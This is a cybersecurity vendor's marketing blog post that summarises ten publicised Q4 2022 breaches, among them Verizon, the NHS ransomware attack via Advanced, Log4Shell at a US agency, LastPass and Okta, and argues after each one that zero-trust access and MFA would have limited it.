Blog
Dec 28, 2022
12 min read

10 Cybersecurity Breaches of Q4 2022 and How to Prevent Them

This blog reviews 10 of the biggest cyberattacks of Q4 2022 and reveals how the zero-trust model can help mitigate similar attacks in the future.

2022 is coming to a close, and the many prominent organizations that fell victim to cyberattacks in Q4 are undoubtedly glad to bid the year farewell. But what’s the best way to ensure 2023 isn’t just a repeat of the same old breaches? 

The zero-trust security framework offers significant advantages over the outdated perimeter approach. Let’s review 10 of the biggest cyberattacks of Q4 2022 and examine how similar attacks can be mitigated by implementing the zero-trust model.

1. Verizon: PII Theft

In October 2022, bad actors gained access to Verizon customer accounts after exfiltrating the last four digits of their credit card numbers. The attackers exploited this personally identifiable information (PII) to take control of some of the phone numbers belonging to the breached accounts, in what is known as “SIM swapping.” Social engineering or compromised employees may also have played a role in this attack.

How Zero-Trust Could Have Helped: MFA and Anomaly Detection

While we lack information on exactly how this attack was conducted, the blast radius of the breach could have been limited substantially had multi-factor authentication (MFA) been in place. When MFA is implemented, users are verified according to multiple factors and not just a simple password. Additional verification factors can include one-time passwords (OTPs), tokens, geographical location, biometric data, and more. MFA can prevent SIM swapping attacks because the last four digits of a credit card number become insufficient to perform actions on users’ accounts when an additional verification method is required for access.

MFA is an important security tool that should be enabled not just by Verizon but by all companies. After all, breached customer data from one company can be used to verify access to resources of another company. For example, the credit card data acquired in the Verizon attack might be used to access these customers’ electric bills, e-commerce shopping accounts, banks, and more.

In the aftermath of the attack, Verizon advised customers to set a new PIN code, password and secret question. While these measures are standard for maintaining good security hygiene, MFA could ensure protection without placing the burden on the customer. Zero-trust access solutions like Cyolo also enable passwordless authentication, removing the need for passwords altogether.

Beyond MFA, the anomaly detection capabilities of a zero-trust platform could have lessened the damage of the Verizon breach by recognizing unusual activity and raising the alert. For instance, a zero-trust tool with real-time session monitoring would have detected a large number of requests for SIM swapping or SIM swapping requests from customers who weren’t likely to make such a request. After receiving an alert on this strange behavior, security team members might have been able to recognize the breach, boot the attackers from the system, and minimize the incident’s impact.

2. EnergyAustralia: Credentials Compromise

Also in October, critical infrastructure electricity company EnergyAustralia was breached, resulting in the exposure of 323 customer accounts. The accounts contained PII like names, emails, addresses, bills, phone numbers, and some credit card details. In the wake of this breach, EnergyAustralia announced it is adding additional layers of security, including 12-character passwords.

How Zero-Trust Could Have Helped: Personal Vaults and Passwordless Verification

Passwords are vulnerable by design. Zero-trust limits the reliance on passwords by verifying through additional means, like MFA (see above). However, zero-trust can completely eliminate the need for passwords, by providing a passwordless verification experience.

And even if companies do want to still use passwords, they can adopt a zero-trust access solution that includes personal credentials vaults rather than a central password database. In such a setup, bad actors do not have a single, centralized resource to attack in order to compromise a large number of employee and customer passwords.

3. Bed Bath & Beyond: Phishing

Retail giant Bed Bath & Beyond was breached through a phishing scam targeting an employee. The attackers were able to progress laterally into the employee’s hard drive and some shared drives, accessing at least some corporate data.

How Zero-Trust Could Have Helped: Network Cloaking

A primary tenet of zero-trust security is that networks remain cloaked from all users; visibility to network components (never the full network) is granted only to verified users. This ensures that unauthorized users do not even know what resources exist on the network. Even if an attacker does penetrate the system, they would not be able to make significant lateral advancement since all resources would be cloaked.

In addition, anomalous behavior detection (see above) could help alert security professionals of unusual access to shared drives. 

4. NHS: Third-Party Breach and Ransomware

Advanced is a third-party IT provider to the NHS, the British healthcare service. Advanced was Advanced was breached, critical data was stolen, and NHS services were disrupted. During the attack, the perpetrators leveraged third-party credentials to establish a remote desktop session to the company’s Citrix server. The attackers then moved laterally across environments, escalated privileges, and deployed encryption malware. Finally, critical data was exfiltrated and encrypted in order to execute a ransomware attack.

The attackers used the LockBit 3.0 Ransomware-as-a-Service system. Following the attack, the Advanced security team disconnected the entire environment to contain the threat and limit the attackers’ access, which also disrupted services across the NHS. 

How Zero-Trust Could Have Helped: Citrix Replacement, MFA, and Secure Third-Party Access

Citrix provides remote virtual connectivity, but it is vulnerable to breach due to its global accessibility. Zero-trust access, which enables protected remote access while also reducing the attack surface, is a more secure replacement for Citrix. In addition to ensuring secure connectivity, zero-trust access platforms like Cyolo also include real-time session monitoring plus session recording for more advanced monitoring and incident investigation.

As we’ve seen with many breaches, MFA could also have limited the damage caused by the Advanced attack. When users must be verified through multiple factors, stolen credentials become almost useless to attackers, as they are not sufficient for gaining access to critical resources. Had MFA been in place, the third-party credentials could not have enabled the attackers to establish a connection to Advanced’s servers and the ransomware attack would have been stopped in its tracks.

Lastly, in the zero-trust security framework, all users are verified and authorized every time they attempt to access a system or resource (and again, they never receive access to the full network). This is true for third-party users, remote employees, acquired companies, etc. By ensuring that all its third-party vendors, such as Advanced, connect to critical systems only via zero-trust access, the NHS can prevent future supply chain attacks

5. Amazon: Publicly Exposed Server

An Amazon Elasticsearch database with valuable company data was publicly exposed and left available to anyone with the server’s IP address. The server contained 215 million entries of pseudonymized viewing data, including the name of the show or movie being streamed, the streaming device, network quality, and subscription details. The server was detectable by Shodan.io, a search engine for internet-connected things.

How Zero-Trust Could Have Helped: Continuous Authorization

In the traditional perimeter model for cybersecurity, a location or IP address was a strong enough identifying factor to grant a user network access. In the zero-trust approach, by contrast, users and devices need to be verified according to their identity whenever they want to access a given resource. And this verification is not one-and-done; an ongoing authorization process runs continuously to check for anomalous behavior, as described in some of the scenarios above. 

In the case of Amazon, had the exposed server been secured with zero-trust access, attackers or bypassers would have been unable to access it. Moreover, the actions of anyone using the server would be monitored both in real-time and recorded for auditing purposes.

6. AstraZeneca: Exposed Credentials

In 2021, a developer left credentials for accessing an AstraZeneca internal server on GitHub, and the so-called “user error” was corrected only after more than a year, in November 2022. The credentials enabled access to a Salesforce testing environment that also held patient data.

How Zero-Trust Could Have Helped: Developer Verification and Just-in-Time Access

Developers have access to the enterprise’s most valuable assets: production environments, source code and cloud infrastructure. Should a bad actor obtain a developer’s credentials, they therefore have the potential ability to carry out a widespread and destructive cyberattack. In this case the incident appears to have been inadvertent rather than malicious, but it remains easy to see how exposed developer credentials could both seriously disrupt development and compromise patient privacy and wellbeing.

As we have seen, zero-trust is a secure alternative to credentials-based access. By verifying users through methods like single sign-on (SSO), credentials no longer provide access to SaaS systems, eliminating the need for developers to use them and removing their value for attackers.

Zero-trust authorization is speedy and seamless for all users, including privileged users like developers. They are verified to ensure they can access the resources they need to, but without compromising on speed or business agility. This enables developer-reliant businesses to enjoy the benefits of zero-trust security, without disrupting the developer workflow.

7. US Government: Log4Shell Exploitation

An Iranian-backed hacker group breached a US Federal Government organization after exploiting a Log4Shell vulnerability on an unpatched VMware Horizon server. Following the breach, they deployed an XMRig cryptocurrency miner, moved laterally to the domain controller, compromised credentials, and finally set up Ngrok reverse proxies on compromised servers.

How Zero-Trust Could Have Helped: Denied Access and Visibility to Attackers

Zero-trust access solutions cloak the network from non-verified users, preventing attackers from seeing servers at all, let alone their vulnerabilities. The culprits in this attack would neither have been able to access the VMware Horizon server nor know that it was unpatched and therefore vulnerable to Log4Shell. In addition, virtual patching could have been conducted to the Log4Shell vulnerability when it was first discovered.

As in the case of many of the other attacks we’ve highlighted, zero-trust measures like MFA, auditing, real-time monitoring and anomalous behavior detection would also have helped minimize the blast radius of this breach.

8. Dropbox: Phishing and Source Code Access

In November, a phisher impersonated Dropbox’s code integration and delivery platform, CircleCI, and obtained developer credentials. These credentials enabled them to breach private GitHub code repositories and secret API credentials, since they were reused by developers.

How Zero-Trust Could Have Helped: MFA and Passwordless Access

In response to the attack, Dropbox published a blog detailing what happened and their planned actions to strengthen the security of their systems. One of these is implementing MFA  to ensure that credentials theft will no longer be enough to breach critical assets.

Another key step Dropbox could take is to prevent the recycling of credentials between systems, limiting attackers’ ability to compromise accounts based on other breached accounts. As we already mentioned, some zero-trust access solutions also enable the elimination of passwords.

9. LastPass: Credentials Breach - The Sequel

LastPass was breached in August this year; then, in November, the same attackers used information from the previous attack to breach LastPass again. This means the vulnerabilities that enabled the first attack had not yet been fully remediated three months later.

How Zero-Trust Could Have Helped: Continuous Verification and Cloaking

The zero-trust security framework is founded on the assumption that attackers are already inside the system. In the case of the second LastPass breach, this was literally true. By securing access to critical resources and cloaking the network even from supposedly trusted users, zero-trust helps reduce the magnitude of breaches. Had zero-trust access and monitoring requirements been in place, they may have prevented the attackers from being able to exploit their previous access to compromise LastPass a second time. 

More important is the fact that zero-trust security eliminates the risk of password breach entirely. LastPass is an external resource that stores organizational passwords. This makes its customers highly vulnerable to a breach of LastPass as part of their supply chain. As previously noted, zero-trust access solutions like Cyolo provide a decentralized solution for password protection through personal vaults. This means LastPass customers can use that service without relying on LastPass’s security standards. In addition, zero-trust can provide a passwordless experience for users, fully removing the need to store passwords or manage password-related risk.

10. Okta: Source Code Breach

As the sun was already setting on 2022, attackers managed to conduct one more large-scale breach. Authentication provider Okta was hacked, and the attackers gained access to its private source code on GitHub. GitHub alerted Okta about suspicious access, who then hardened security measures on the repositories. According to Okta, no customer data was impacted.

How Zero-Trust Could Have Helped: Verification for Okta and Okta's Clients

In the zero-trust model, users are verified each time they access resources and when they attempt to take actions like copying or pasting data. Zero-trust could have prevented access to Okta’s source code by blocking unauthorized users from it. And even if an attacker had managed to access the source code, they would have been blocked from copying it. 

In addition, zero-trust would complement Okta by providing an extra layer of security. The advanced verification and monitoring capabilities of a zero-trust access solution would have blocked the Okta attackers from accessing critical applications, eliminating the risk of Okta as a single point of failure.

Cybersecurity and Zero-Trust in 2023

As we enter a new year, it’s clear that many enterprises in many industries need stronger cybersecurity defenses to protect their systems and critical assets from the attacks that undoubtedly lie ahead. 

As we have seen, zero-trust is the most comprehensive security approach enterprises can adopt to keep sensitive data out of unauthorized hands. And implementing zero-trust is significantly easier than you may think. This recent blog seriesexplains the three steps to zero-trust adoption. Equally important to the decision to move forward with a zero-trust initiative is the vendor you choose to work with. Top considerations should include the range of available features, support for your operations, and ease of use for both administrators and users. With the right zero-trust access platform and partner, you will have the ability to minimize attackers’ impact on your valuable assets in 2023 and beyond.

Learn more about how zero-trust can help you with a free Cyolo consultation.

Jennifer Tullman-Botzer

Author

Jennifer Tullman-Botzer is a cybersecurity nerd by day and a history nerd by night. She has over a decade of experience in cybersecurity marketing and is as tired as you are of hackers-in-hoodies stock images. Jennifer joined Cyolo in 2021 and currently serves as Head of Content. Prior to Cyolo, she worked in a variety of marketing roles at IBM Security. She lives in Tel Aviv, Israel.

Subscribe to Our Newsletter